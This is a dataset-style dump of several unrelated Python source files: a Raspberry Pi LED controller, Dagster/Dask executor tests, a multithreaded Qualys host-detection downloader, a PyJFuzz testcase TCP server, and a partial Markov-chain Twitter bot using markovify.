source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
pixels_aiy_v1.py | import time
import queue
import threading
import RPi.GPIO as GPIO
_GPIO_PIN = 25
class Pixels:
def __init__(self):
self.is_light_on = 1
self.count_down = 0
self.light_on_count = 0
self.light_off_count = 0
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BCM)
GPIO.setup(_GPIO_PIN, GPIO.OUT)
self.queue = queue.Queue()
self.off()
self.thread = threading.Thread(target=self._run)
self.thread.daemon = True
self.thread.start()
def wakeup(self, direction=0):
self.queue.put((1, 1))
def listen(self):
self.queue.put((5, 5))
def think(self):
self.queue.put((3, 3))
def speak(self):
self.queue.put((10, 0))
def off(self):
self.queue.put((0, 10))
def _set_light_on(self, on):
pos = GPIO.HIGH if on else GPIO.LOW
GPIO.output(_GPIO_PIN, pos)
def _run(self):
while True:
while not self.queue.empty():
(self.light_on_count, self.light_off_count) = self.queue.get()
self.is_light_on = 0
self.count_down = 0
while self.queue.empty():
if self.count_down == 0:
self.is_light_on = not self.is_light_on
if self.is_light_on:
self.count_down = self.light_on_count
else:
self.count_down = self.light_off_count
if self.count_down == 0:
continue
self._set_light_on(self.is_light_on)
time.sleep(0.1)
self.count_down -= 1
pixels = Pixels()
if __name__ == '__main__':
while True:
try:
pixels.wakeup()
time.sleep(3)
pixels.listen()
time.sleep(3)
pixels.think()
time.sleep(3)
pixels.speak()
time.sleep(3)
pixels.off()
time.sleep(3)
except KeyboardInterrupt:
break
pixels.off()
time.sleep(1)
|
test_execute.py | import asyncio
import tempfile
import time
from threading import Thread
import dagster_pandas as dagster_pd
import pytest
from dagster import (
DagsterUnmetExecutorRequirementsError,
InputDefinition,
ModeDefinition,
execute_pipeline,
execute_pipeline_iterator,
file_relative_path,
pipeline,
reconstructable,
solid,
)
from dagster.core.definitions.executor import default_executors
from dagster.core.definitions.reconstructable import ReconstructablePipeline
from dagster.core.events import DagsterEventType
from dagster.core.test_utils import instance_for_test, nesting_composite_pipeline
from dagster.utils import send_interrupt
from dagster_dask import DataFrame, dask_executor
from dask.distributed import Scheduler, Worker
@solid
def simple(_):
return 1
@pipeline(mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])])
def dask_engine_pipeline():
simple()
def test_execute_on_dask_local():
with tempfile.TemporaryDirectory() as tempdir:
with instance_for_test(temp_dir=tempdir) as instance:
result = execute_pipeline(
reconstructable(dask_engine_pipeline),
run_config={
"intermediate_storage": {"filesystem": {"config": {"base_dir": tempdir}}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
},
instance=instance,
)
assert result.result_for_solid("simple").output_value() == 1
def dask_composite_pipeline():
return nesting_composite_pipeline(
6, 2, mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])]
)
def test_composite_execute():
with instance_for_test() as instance:
result = execute_pipeline(
reconstructable(dask_composite_pipeline),
run_config={
"intermediate_storage": {"filesystem": {}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
},
instance=instance,
)
assert result.success
@solid(input_defs=[InputDefinition("df", dagster_pd.DataFrame)])
def pandas_solid(_, df): # pylint: disable=unused-argument
pass
@pipeline(mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])])
def pandas_pipeline():
pandas_solid()
def test_pandas_dask():
run_config = {
"solids": {
"pandas_solid": {
"inputs": {"df": {"csv": {"path": file_relative_path(__file__, "ex.csv")}}}
}
}
}
with instance_for_test() as instance:
result = execute_pipeline(
ReconstructablePipeline.for_file(__file__, pandas_pipeline.name),
run_config={
"intermediate_storage": {"filesystem": {}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
**run_config,
},
instance=instance,
)
assert result.success
@solid(input_defs=[InputDefinition("df", DataFrame)])
def dask_solid(_, df): # pylint: disable=unused-argument
pass
@pipeline(mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])])
def dask_pipeline():
dask_solid()
def test_dask():
run_config = {
"solids": {
"dask_solid": {
"inputs": {
"df": {"read": {"csv": {"path": file_relative_path(__file__, "ex*.csv")}}}
}
}
}
}
with instance_for_test() as instance:
result = execute_pipeline(
ReconstructablePipeline.for_file(__file__, dask_pipeline.name),
run_config={
"intermediate_storage": {"filesystem": {}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
**run_config,
},
instance=instance,
)
assert result.success
def test_execute_on_dask_local_with_intermediate_storage():
with tempfile.TemporaryDirectory() as tempdir:
with instance_for_test(temp_dir=tempdir) as instance:
result = execute_pipeline(
reconstructable(dask_engine_pipeline),
run_config={
"intermediate_storage": {"filesystem": {"config": {"base_dir": tempdir}}},
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
},
instance=instance,
)
assert result.result_for_solid("simple").output_value() == 1
def test_execute_on_dask_local_with_default_storage():
with pytest.raises(DagsterUnmetExecutorRequirementsError):
with instance_for_test() as instance:
result = execute_pipeline(
reconstructable(dask_engine_pipeline),
run_config={
"execution": {"dask": {"config": {"cluster": {"local": {"timeout": 30}}}}},
},
instance=instance,
)
assert result.result_for_solid("simple").output_value() == 1
@solid(input_defs=[InputDefinition("df", DataFrame)])
def sleepy_dask_solid(_, df): # pylint: disable=unused-argument
start_time = time.time()
while True:
time.sleep(0.1)
if time.time() - start_time > 120:
raise Exception("Timed out")
@pipeline(mode_defs=[ModeDefinition(executor_defs=default_executors + [dask_executor])])
def sleepy_dask_pipeline():
sleepy_dask_solid()
def test_dask_terminate():
run_config = {
"solids": {
"sleepy_dask_solid": {
"inputs": {
"df": {"read": {"csv": {"path": file_relative_path(__file__, "ex*.csv")}}}
}
}
}
}
interrupt_thread = None
result_types = []
with instance_for_test() as instance:
for result in execute_pipeline_iterator(
pipeline=ReconstructablePipeline.for_file(__file__, sleepy_dask_pipeline.name),
run_config=run_config,
instance=instance,
):
# Interrupt once the first step starts
if result.event_type == DagsterEventType.STEP_START and not interrupt_thread:
interrupt_thread = Thread(target=send_interrupt, args=())
interrupt_thread.start()
if result.event_type == DagsterEventType.STEP_FAILURE:
assert (
"DagsterExecutionInterruptedError" in result.event_specific_data.error.message
)
result_types.append(result.event_type)
interrupt_thread.join()
assert DagsterEventType.STEP_FAILURE in result_types
assert DagsterEventType.PIPELINE_FAILURE in result_types
def test_existing_scheduler():
def _execute(scheduler_address, instance):
return execute_pipeline(
reconstructable(dask_engine_pipeline),
run_config={
"intermediate_storage": {"filesystem": {}},
"execution": {
"dask": {"config": {"cluster": {"existing": {"address": scheduler_address}}}}
},
},
instance=instance,
)
async def _run_test():
with instance_for_test() as instance:
async with Scheduler() as scheduler:
async with Worker(scheduler.address) as _:
result = await asyncio.get_event_loop().run_in_executor(
None, _execute, scheduler.address, instance
)
assert result.success
assert result.result_for_solid("simple").output_value() == 1
asyncio.get_event_loop().run_until_complete(_run_test())
|
qualysguard_host_list_detection.py | from __future__ import print_function
__author__ = 'Parag Baxi'
# System modules
import argparse
import ast
import ConfigParser
import datetime
import logging
import os
import sys
import time
from Queue import Queue
from threading import Thread
# Local modules
import qualysapi
from lxml import objectify, etree
def download_hosts(i, q):
"""This is the worker thread function.
It processes items in the queue one after
another. These daemon threads go into an
infinite loop, and only exit when
the main thread ends.
"""
global c_args, datetime_format, start_time_hosts_detection
# Have thread number start at 1 for human display.
thread_number = i + 1
# Download assigned hosts in this thread.
while True:
logger.debug('Thread %s: Looking for the next enclosure' % (thread_number))
ids = q.get()
# Chunk received. Start time.
if not start_time_hosts_detection:
start_time_hosts_detection = time.time()
# Find start & end host ids for logging.
if not ',' in ids:
# Only one host_id or one range, no comma found.
ids_range = ids
else:
try:
thread_start = ids[:ids.index(',')]
thread_end = ids[ids.rindex(',')+1:]
ids_range = '%s-%s' % (thread_start, thread_end)
except ValueError, e:
# Only one host_id, no comma found.
ids_range = ids
logger.info('Thread %s: Downloading new hosts.' % (thread_number))
logger.debug('Thread %s: Downloading new hosts: %s' % (thread_number, ids))
# Set parameters.
params = {'action': 'list',
'ids': ids,
'output_format': c_args.format,}
# Suppress duplicate data for CSV format.
if 'CSV' in params['output_format']:
params.update({'suppress_duplicated_data_from_csv': '1'})
# Add user parameter options, if applicable.
if c_args.parameters:
user_params = ast.literal_eval(c_args.parameters)
params.update(user_params)
# Download host list detection chunk.
response = qgc.request('/api/2.0/fo/asset/host/vm/detection/',
params)
q.task_done()
# Don't write to file if benchmarking.
if not c_args.benchmark:
file_extension = 'csv'
if c_args.format == 'XML':
file_extension = 'xml'
filename = '%s/%s-host_ids-%s.%s' % (c_args.output_directory, datetime_format, ids_range, file_extension)
logger.debug('Writing hosts file: %s' % filename)
with open(filename, 'w') as host_file:
print(response, file = host_file)
logger.debug('Thread %s: Finished downloading.: %s' % (thread_number, ids))
def save_config():
"""
:return: Completed save.
"""
global host_id_start
# Save start and end to file.
cfgfile = open("config.ini",'w')
try:
Config.add_section('Host ID')
except ConfigParser.DuplicateSectionError, e:
# File already exists.
pass
Config.set('Host ID','start',host_id_start)
Config.write(cfgfile)
cfgfile.close()
return True
def find_start_host_id(id_start):
"""
:param id_start: Host ID to start querying.
:return: Start Host ID.
"""
global qgc
tree = qgc.request('/api/2.0/fo/asset/host/',
{'action': 'list',
'id_min': str(id_start),
'details': 'None',
'truncation_limit': '1',})
# Objectify.
host_list_output = objectify.fromstring(tree)
# Find start ID.
host_id_start = id_start = host_list_output.RESPONSE.ID_SET.ID.text
return host_id_start
def ids_in_id_list(tree):
"""Return set of extracted IPs from IP list XML.
"""
ids = []
# Grab all IDs and ID ranges.
id_list = tree.xpath('//ID_SET/descendant::*/text()')
for i in id_list:
logger.debug('ID: %s' % i)
if '-' in i:
id_start = i[:i.find('-')]
id_end = i[i.find('-')+1:]
ids += range(int(id_start),int(id_end)+1)
else:
ids += [int(i)]
return ids
def chunk_to_parameter(chunk):
"""
:param chunk: List of numbers.
:return: String of numbers, comma delimited, no spaces.
"""
numbers = ''
for number in chunk:
numbers += '%s,' % number
# Remove last comma.
numbers = numbers[:-1]
return numbers
def add_work_and_find_end_host_id(id_start, num_hosts_per_call):
"""
:param id_start: Host ID to start querying.
:param num_hosts_per_call: Number of hosts to query per call.
:return: Last host ID.
"""
global hosts_queue, logger, num_hosts
chunk = []
while True:
id_start += 1
logger.debug('Calling host API to identify host ids.')
tree = qgc.request('/api/2.0/fo/asset/host/',
{'action': 'list',
'id_min': str(id_start),
'details': 'None',
'truncation_limit': num_hosts_per_call,})
# Extract host ids.
ids = ids_in_id_list(etree.fromstring(tree))
# Add length to total number of hosts.
num_hosts += len(ids)
logger.info('Found %s id(s), will now queue.' % str(len(ids)))
logger.debug('ids found: %s' % str(ids))
# Are there any more hosts?
if not ids:
# No more new hosts.
logger.info('No more new hosts.')
# Is the current chunk incomplete?
if chunk:
# Send it to work queue.
# Add work to the queue.
logger.debug('Queuing remaining id(s): %s' % str(chunk))
hosts_queue.put(chunk_to_parameter(chunk))
break
# For next round, find last host id, set to new start host id.
id_start = ids[len(ids)-1]
# Add hosts to work queue by popping until chunks are full.
# Popping removes from end, so reverse to maintain order.
ids.reverse()
# Work until ids is empty.
while ids:
# Add to chunk.
chunk.append(ids.pop())
logger.debug('id added: %s' % str(chunk[-1]))
# Is chunk is full?
if len(chunk) == c_args.hosts_to_download_per_call:
# Add work to the queue.
logger.debug('Queuing: %s' % str(chunk))
hosts_queue.put(chunk_to_parameter(chunk))
# Reset chunk.
chunk = []
# Return last host, which was saved in id_start from while loop.
logger.debug('Done processing up to host id: %s' % str(id_start))
return id_start
#
# Begin
#
# Set timers.
start_time_hosts_detection = False
start_time = time.time()
# Declare the command line flags/options we want to allow.
parser = argparse.ArgumentParser(
description='Download hosts concurrently and efficiently via host list detection API.')
# parser.add_argument('-a', '--override_all_apps',
# help='Generate report for all webapps. Automatically selected for first run.')
# Do not store files.
parser.add_argument('--benchmark',
action = 'store_true',
help = argparse.SUPPRESS)
parser.add_argument('--config',
help = 'Configuration for Qualys connector.')
parser.add_argument('-d', '--hosts_to_download_per_call',
default=1000,
help='Override default number of hosts (1000) to download per call for host vulnerability data.')
parser.add_argument('-f', '--format',
default='CSV_NO_METADATA',
help='Set host list detection output format. (Default = CSV_NO_METADATA)')
parser.add_argument('-i','--host_id_discovery_truncation_limit',
default=5000,
help='Override default truncation limit (5000) for host ID discovery.')
parser.add_argument('-o', '--output_directory',
default='data',
help='Set directory for data output. (Default = data)')
parser.add_argument('-p', '--parameters',
help='Set host list detection parameters (Default: {\'suppress_duplicated_data_from_csv\': \'1\'})\n(Example: \"{\'include_search_list_titles\': \'SSL+certificate\', \'active_kernels_only\': \'1\'}\")')
parser.add_argument('-t', '--threads',
default=2,
help='Number of concurrent threads to call the host list detection API with. (Default = 2)')
parser.add_argument('-v', '--verbose',
action = 'store_true',
help='Outputs additional information to log.')
# Parse arguments.
c_args = parser.parse_args()
c_args.hosts_to_download_per_call = int(c_args.hosts_to_download_per_call)
# Create log and data directories.
PATH_LOG = 'log'
if not os.path.exists(PATH_LOG):
os.makedirs(PATH_LOG)
if not os.path.exists(c_args.output_directory):
os.makedirs(c_args.output_directory)
# Set log options.
datetime_format = datetime.datetime.now().strftime('%Y-%m-%d.%H-%M-%S')
LOG_FILENAME = '%s/%s-%s.log' % (PATH_LOG,
__file__,
datetime_format)
# Make a global logging object.
logger = logging.getLogger()
if c_args.verbose:
logger.setLevel(logging.DEBUG)
else:
logger.setLevel(logging.INFO)
logging.getLogger('qualysapi').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.ERROR)
# This handler writes everything to a file.
logger_file = logging.FileHandler(LOG_FILENAME)
logger_file.setFormatter(logging.Formatter("%(asctime)s %(name)-12s %(levelname)s %(funcName)s %(lineno)d %(message)s"))
# This handler prints to screen.
logger_console = logging.StreamHandler(sys.stdout)
if c_args.verbose:
logger_file.setLevel(logging.DEBUG)
logger_console.setLevel(logging.DEBUG)
else:
logger_file.setLevel(logging.INFO)
logger_console.setLevel(logging.ERROR)
logger.addHandler(logger_file)
logger.addHandler(logger_console)
# Configure Qualys API connector.
if c_args.config:
qgc = qualysapi.connect(c_args.config)
else:
qgc = qualysapi.connect()
# Read config file, if available.
Config = ConfigParser.ConfigParser()
Config.read('config.ini')
try:
host_id_start = Config.getint('Host ID', 'start')
logger.debug('Read host_id_start from config file: %s' % str(host_id_start))
except ConfigParser.NoSectionError, e:
# Discover start host_id, minimum is 1.
host_id_start = 1
# Confirm start id. May be pushed back due to purging.
host_id_start = int(find_start_host_id(host_id_start))
logger.debug('New host_id_start: %s' % host_id_start)
# Keep track of number of hosts.
num_hosts = 0
# Set up multi-threading.
# Number of threads.
threads = int(c_args.threads)
# Set up some global variables
hosts_queue = Queue()
# Set up some threads to fetch the enclosures
for i in range(threads):
worker = Thread(target=download_hosts, args=(i, hosts_queue,))
worker.setDaemon(True)
worker.start()
# Find hosts and queue work.
host_id_end = add_work_and_find_end_host_id(host_id_start, c_args.host_id_discovery_truncation_limit)
logger.debug('host_id_end: %s' % str(host_id_end))
elapsed_time_host_ids = time.time() - start_time
# Save configuration
save_config()
# Now wait for the queue to be empty, indicating that we have
# processed all of the downloads.
logger.info('*** All hosts queued. Waiting for downloads to complete.')
hosts_queue.join()
logger.info('*** Done')
elapsed_time = time.time() - start_time
elapsed_time_hosts_detection = time.time() - start_time_hosts_detection
logger.info('Number of threads: %s' % str(c_args.threads))
logger.info('Number of hosts downloaded per call: %s' % str(c_args.hosts_to_download_per_call))
logger.info('Number of hosts downloaded: %s' % num_hosts)
logger.info('Seconds elapsed to download all hosts ids: %s' % elapsed_time_host_ids)
logger.info('Seconds elapsed to download all hosts detection data: %s' % elapsed_time_hosts_detection)
logger.info('Seconds elapsed total: %s' % elapsed_time) |
pjf_testcase_server.py | """
The MIT License (MIT)
Copyright (c) 2016 Daniele Linguaglossa <d.linguaglossa@mseclab.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NON INFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import sys
import time
import threading
import struct
import socket
from pjf_logger import PJFLogger
from errors import PJFMissingArgument, PJFBaseException, PJFSocketError
class PJFTestcaseServer(object):
def __init__(self, configuration):
self.logger = self.init_logger()
if ["ports"] not in configuration:
raise PJFMissingArgument("PJFTesecaseServer needs \"ports\" argument inside config object")
self.config = configuration
self.testcase = []
self.starting = True
self.number_of_testcase = 0
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._sock.bind(('', self.config.ports["servers"]["TCASE_PORT"]))
self.logger.debug("[{0}] - PJFTestcaseServer successfully initialized".format(time.strftime("%H:%M:%S")))
def handle(self, sock):
"""
Handle the actual TCP connection
"""
try:
size = struct.unpack("<I", sock.recv(4))[0]
data = ""
while len(data) < size:
data += sock.recv(size - len(data))
if len(self.testcase) >= 100:
del self.testcase
self.testcase = list()
self.testcase.append(data)
sock.close()
except socket.error as e:
raise PJFSocketError(e.message)
except Exception as e:
raise PJFBaseException(e.message)
def _shutdown(self, *args):
"""
Kill TCP server
"""
self.starting = False
try:
self._sock.close()
except socket.error:
pass
self.logger.debug("[{0}] - PJFTestcaseServer successfully completed".format(time.strftime("%H:%M:%S")))
def increment_testcase(self):
"""
Increment the testcase number
"""
self.number_of_testcase += 1
def got_testcase(self):
"""
Check if a testcase was received
"""
return len(self.testcase) > self.number_of_testcase
def listen(self):
"""
Listen on host:port
"""
self._sock.listen(1)
while self.starting:
try:
sock, ip = self._sock.accept()
threading.Thread(target=self.handle, args=(sock,)).start()
except socket.error:
pass
def start(self):
"""
Start TCP Server
"""
self.starting = True
threading.Thread(target=self.listen).start()
def init_logger(self):
"""
Init the default logger
"""
return PJFLogger.init_logger()
@staticmethod
def send_testcase(json, ip, port):
"""
Send a raw testcase
"""
try:
json = struct.pack("<I", len(json)) + json
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send(json)
s.shutdown(socket.SHUT_RDWR)
s.close()
return True
except socket.error:
return False
except socket.error as e:
raise PJFSocketError(e.message)
except Exception as e:
raise PJFBaseException(e.message)
|
markovbot.py | # -*- coding: utf-8 -*-
#
# For installation instructions and more information, please refer to:
# http://www.pygaze.org/2016/03/tutorial-creating-a-twitterbot/
# (This includes instructions to install the Twitter library used here)
#
# This file is part of markovbot, created by Edwin Dalmaijer
# GitHub: https://github.com/esdalmaijer/markovbot
#
# Markovbot is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Markovbot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with markovbot. If not, see <http://www.gnu.org/licenses/>.
# native imports
import os
import sys
import re
import copy
import time
import nltk
import html
import pickle
import random
import markovify
from markovify.chain import BEGIN
from html.parser import HTMLParser
from threading import Thread, Lock
from multiprocessing import Queue
# external imports
# Twitter package: https://pypi.python.org/pypi/twitter
# Homepage of Twitter package: http://mike.verdone.ca/twitter/
try:
import twitter
IMPTWITTER = True
except:
print(u"WARNING from Markovbot: Could not load the 'twitter' library, so Twitter functionality is not available.")
IMPTWITTER = False
class MarkovBot():
"""Class to generate text with a Markov chain, with support to read and
post updates to Twitter accounts.
"""
def __init__(self):
"""Initialises the bot.
"""
# # # # #
# DATA
# Create an empty dict for the data
self.data = {u'default': {}}
self.bot = None
# # # # #
# TWITTER
# Starting value for the Twitter and TwitterStream instances
self._t = None
self._ts = None
# Create locks for these instances, so they won't be accessed at the
# same time by different threads.
self._tlock = Lock()
self._tslock = Lock()
# Create a Boolean that indicates whether the bot is logged in, and
# a placeholder for the credentials of the user that is logged in
self._loggedin = False
self._credentials = None
# Create variables to keep track of tweets that should not be
# replied to. The self._maxconvdepth value determines the maximum
# conversation lenght that this bot is allowed to participate in.
# Keep the number low to prevent the bot from being spammy.
self._nonotweets = []
self._maxconvdepth = None
# Placeholders for debugging values of the last incoming and
# outgoing tweets
self._lasttweetin = None
self._lasttweetout = None
# Prepare the autoreplying thread
self._autoreplying = False
self._autoreply_database = None
self._targetstring = None
self._keywords = None
self._tweetprefix = None
self._tweetsuffix = None
self._mindelay = 0.0
if IMPTWITTER:
self._autoreplythreadlives = True
self._autoreplythread = Thread(target=self._autoreply)
self._autoreplythread.daemon = True
self._autoreplythread.name = u'autoreplier'
else:
self._autoreplythreadlives = False
# Prepare the tweeting thread
self._tweetingdatabase = None
self._autotweeting = False
self._tweetinginterval = None
self._tweetingjitter = None
self._tweetingkeywords = None
self._tweetingprefix = None
self._tweetingsuffix = None
if IMPTWITTER:
self._tweetingthreadlives = True
self._tweetingthread = Thread(target=self._autotweet)
self._tweetingthread.daemon = True
self._tweetingthread.name = u'autotweeter'
else:
self._tweetingthreadlives = False
# Prepare the self-examination Thread (periodically checks whether
# all Threads are still alive, and revives any dead ones.)
self._selfexaminationthreadlives = True
self._selfexaminationthread = Thread(target=self._self_examination)
self._selfexaminationthread.daemon = True
self._selfexaminationthread.name = u'selfexaminer'
# Start all Threads.
if IMPTWITTER:
self._autoreplythread.start()
self._tweetingthread.start()
self._selfexaminationthread.start()
def clear_data(self, database=None):
"""Clears the current internal data. NOTE: This does not remove
existing pickled data!
Keyword Arguments
database - A string that indicates the name of the
specific database that you want to clear,
or None to clear all data. (default = None)
"""
# Overwrite data
if database == None:
self.data = {'default': {}}
else:
try:
self.data.pop(database)
except KeyError:
self._error(u'clear_data',
u"There was no database named '%s'" % (database))
'''def generate_text(self, maxlength, seedword=None, database=u'default',
verbose=False, maxtries=100):
"""Generates random text based on the provided database.
Arguments
maxlength - An integer value indicating the amount of words
that can maximally be produced. The actual
number is determined by where interpunction
occurred. Text will be cut off at a comma,
full stop, and exclamation or question marks.
Keyword Arguments
seedword - A string that indicates what word should be in
the sentence. If None is passed, or if the word
is not in the database, a random word will be
chosen. This value can also be a list of words,
in which case the list will be processed
one-by-one until a word is found that is in the
database.
database - A string that indicates the name of the
specific database that you want to use to
generate the text, or u'default' to use the
default database. (default = 'default')
verbose - Boolean that indicates whether this function
should bother you with excessibe and unnecessary
messages whenever it can't immeadiately produce
a text (it will still raise an Exception after
maxtries attempts).
maxtries - Integer indicating how many attempts the function
is allowed to construct some text (sometimes
this fails, and I couldn't be bothered to do
elaborate debugging)
Returns
sentence - A string that starts with a capital, and ends
with a full stop.
"""
# Raise an Exception when no data exists
if self.data[database] == {}:
self._error(u'generate_text',
u"No data is available yet in database '%s'. Did you read any data yet?" % (database))
# Sometimes, for mysterious reasons, a word duo does not appear as a
# key in the database. This results in a KeyError, which is highly
# annoying. Because I couldn't quite find the bug that causes this
# after a whopping five minutes of looking for it, I decided to go
# with the lazy approach of using a try and except statements. Sorry.
error = True
attempts = 0
# Make a single keyword into a list of them
if type(seedword) in [str]:
seedword = [seedword]
# Run until a proper sentence is produced
while error:
try:
# Get all word duos in the database
keys = self.data[database]
key_list=list(keys)
# print(key_list)
# print(keys)
# Shuffle the word duos, so that not the same is
# found every time
random.shuffle(list(keys))
# Choose a random seed to fall back on when seedword does
# not occur in the keys, or if seedword==None
seed = random.randint(0, len(list(keys)))
w1, w2 = key_list[seed]
# Try to find a word duo that contains the seed word
if seedword != None:
# Loop through all potential seed words
while len(seedword) > 0:
# Loop through all keys (these are (w1,w2)
# tuples of words that occurred together in the
# text used to generate the database
for i in range(len(keys)):
# If the seedword is only one word, check
# if it is part of the key (a word duo)
# If the seedword is a combination of words,
# check if they are the same as the key
if seedword[0] in key_list[i] or \
(tuple(seedword[0].split(u' ')) == \
key_list[i]):
# Choose the words
w1, w2 = key_list[i]
# Get rid of the seedwords
seedword = []
break
# Get rid of the first keyword, if it was not
# found in the word duos
if len(seedword) > 0:
seedword.pop(0)
# Empty list to contain the generated words
words = []
# Loop to get as many words as requested
for i in range(maxlength):
# Add the current first word
words.append(w1)
# Generare a new first and second word, based on the
# database. Each key is a (w1,w2 tuple that points to
# a list of words that can follow the (w1, w2) word
# combination in the studied text. A random word from
# this list is selected. Note: words can occur more
# than once in this list, thus more likely word
# combinations are more likely to be selected here.
w1, w2 = w2, random.choice(self.data[database][(w1, w2)])
# Add the final word to the generated words
words.append(w2)
# Capitalise the first word, capitalise all single 'i's,
# and attempt to capitalise letters that occur after a
# full stop.
for i in range(0, len(words)):
if (i == 0) or (u'.' in words[i-1]) or \
(words[i] == u'i'):
words[i] = words[i].capitalize()
# Find the last acceptable interpunction by looping
# through all generated words, last-to-first, and
# checking which is the last word that contains
# relevant interpunction.
ei = 0
for i in range(len(words)-1, 0, -1):
# Check whether the current word ends with
# relevant interpunction. If it does, use the
# current as the last word. If the interpunction
# is not appropriate for ending a sentence with,
# change it to a full stop.
if words[i][-1] in [u'.', u'!', u'?']:
ei = i+1
elif words[i][-1] in [u',', u';', u':']:
ei = i+1
words[i][-1] = u'.'
# Break if we found a word with interpunction.
if ei > 0:
break
# Cut back to the last word with stop-able interpunction
words = words[:ei]
# Combine the words into one big sentence
sentence = u' '.join(words)
if sentence != u'':
error = False
# If the above code fails
except:
# Count one more failed attempt
attempts += 1
# Report the error to the console
if verbose:
self._message(u'generate_text', u"Ran into a bit of an error while generating text. Will make %d more attempts" % (
maxtries-attempts))
# If too many attempts were made, raise an error to stop
# making any further attempts
if attempts >= maxtries:
self._error(u'generate_text',
u"Made %d attempts to generate text, but all failed. " % (attempts))
return sentence
'''
def generate_text(self, maxlength, seedword=None, database=u'default',
verbose=False, maxtries=100):
"""Generates random text based on the provided database.
Arguments
maxlength - An integer value indicating the amount of words
that can maximally be produced. The actual
number is determined by where interpunction
occurred. Text will be cut off at a comma,
full stop, and exclamation or question marks.
Keyword Arguments
seedword - A string that indicates what word should be in
the sentence. If None is passed, or if the word
is not in the database, a random word will be
chosen. This value can also be a list of words,
in which case the list will be processed
one-by-one until a word is found that is in the
database.
database - A string that indicates the name of the
specific database that you want to use to
generate the text, or u'default' to use the
default database. (default = 'default')
verbose - Boolean that indicates whether this function
should bother you with excessibe and unnecessary
messages whenever it can't immeadiately produce
a text (it will still raise an Exception after
maxtries attempts).
maxtries - Integer indicating how many attempts the function
is allowed to construct some text (sometimes
this fails, and I couldn't be bothered to do
elaborate debugging)
Returns
sentence - A string that starts with a capital, and ends
with a full stop.
"""
comment = ""
bot = self.bot
while True:
# For each sentence, check how close to the average comment length
# we are, then use the remaining percentage as the chance of
# adding another sentence. For example, if we're at 70% of the
# average comment length, there will be a 30% chance of adding
# another sentence. We're also adding a fixed 10% on top of that
# just to increase the length a little, and have some chance of
# continuing once we're past the average.
portion_done = len(comment) / float(25)
continue_chance = 1.0 - portion_done
continue_chance = max(0, continue_chance)
continue_chance += 0.1
if random.random() > continue_chance:
break
if seedword != None:
while len(seedword) > 0:
new_sentence = bot.make_short_sentence(maxlength, beginning=seedword, tries=10000,
max_overlap_total=10,
max_overlap_ratio=0.5)
if new_sentence:
break
new_sentence = bot.make_short_sentence(maxlength, tries=10000,
max_overlap_total=10,
max_overlap_ratio=0.5)
comment += " " + new_sentence
comment = comment.strip()
return comment
def pickle_data(self, filename):
"""Stores a database dict in a pickle file
Arguments
filepath - A string that indicates the path of the new
pickle file
"""
# Store the database in a pickle file
with open(filename, u'wb') as f:
pickle.dump(self.data, f)
def read(self, filename, database=u'default', overwrite=False):
"""Reads a text, and adds its stats to the internal data. Use the
mode keyword to overwrite the existing data, or to add the new
reading material to the existing data. NOTE: Only text files can be
read! (This includes .txt files, but can also be .py or other script
files if you want to be funny and create an auto-programmer.)
Arguments
filename - String that indicates the path to a .txt file
that should be read by the bot.
Keyword Arguments
database - A string that indicates the name of the
specific database that you want to add the
file's data to, or u'default' to add to the
default database. (default = 'default')
overwrite - Boolean that indicates whether the existing data
should be overwritten (True) or not (False). The
default value is False.
"""
# Clear the current data if required
if overwrite:
self.clear_data(database=database)
# Check whether the file exists
if not self._check_file(filename):
self._error(u'read', u"File does not exist: '%s'" % (filename))
# Read the words from the file as one big string
with open(filename, u'r') as f:
# Read the contents of the file
contents = f.read()
# Unicodify the contents
contents = contents
#.decode(u'utf-8')
bot = PolitionSimulator(contents)
self.bot = bot
#self.data[database] = bot
'''# Split the words into a list
words = contents.split()
# Create a new database if this is required.
if not database in self.data.keys():
self._message(u'read',
u"Creating new database '%s'" % (database))
self.data[database] = {}
# Add the words and their likely following word to the database
for w1, w2, w3 in self._triples(words):
# Only use actual words and words with minimal interpunction
if self._isalphapunct(w1) and self._isalphapunct(w2) and \
self._isalphapunct(w3):
# The key is a duo of words
key = (w1, w2)
# Check if the key is already part of the database dict
if key in self.data[database]:
# If the key is already in the database dict,
# add the third word to the list
self.data[database][key].append(w3)
else:
# If the key is not in the database dict yet, first
# make a new list for it, and then add the new word
self.data[database][key] = [w3]'''
